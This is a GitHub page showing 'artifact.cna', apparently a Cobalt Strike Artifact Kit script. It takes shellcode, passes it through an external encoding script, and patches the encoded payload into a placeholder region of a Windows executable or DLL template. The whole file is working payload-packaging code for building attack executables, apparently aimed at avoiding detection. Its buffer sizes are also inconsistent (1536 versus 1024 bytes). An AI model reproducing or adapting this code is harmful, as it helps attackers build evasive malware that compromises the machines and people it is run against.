-
Notifications
You must be signed in to change notification settings - Fork 14
/
artifact.cna
52 lines (42 loc) · 1.31 KB
/
artifact.cna
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
# Artifact Kit Integration Script
# Windows Executables and DLLs
#
# Arguments
# $1 = artifact file (e.g., artifact32.exe)
# $2 = shellcode
# Return
# our generated artifact
set EXECUTABLE_ARTIFACT_GENERATOR {
local('$handle $data $key $index $payload $resource $buffer $b $x');
($resource, $payload) = @_;
$temp = openf(">/tmp/ridgwayunencoded.bin");
writeb($temp, $payload);
closef($temp);
$msf = exec("/opt/cobaltstrike-artifactkit/artifact/dist-ridgway/encode_payload.sh");
wait($msf);
closef($msf);
$in = openf("/tmp/ridgwayencoded.bin");
$encoded_payload = readb($in, -1);
closef($in);
# try again or use the default artifact... I don't have it!
if (!-exists script_resource($resource)) {
return $null;
}
# read in the executable template
$handle = openf(script_resource($resource));
$data = readb($handle, -1);
closef($handle);
# find the location of our data in the executable
$index = indexOf($data, 'A' x 1536);
# pack data into a buffer
$buffer = allocate(1536);
# pack our encoded payload into the buffer
for ($x = 0; $x < strlen($encoded_payload); $x++) {
writeb($buffer, chr((byteAt($encoded_payload, $x))));
}
# retrieve the contents of the buffer.
closef($buffer);
$b = readb($buffer, -1);
# return our encoded shellcode.
return replaceAt($data, "$[1024]b", $index);
}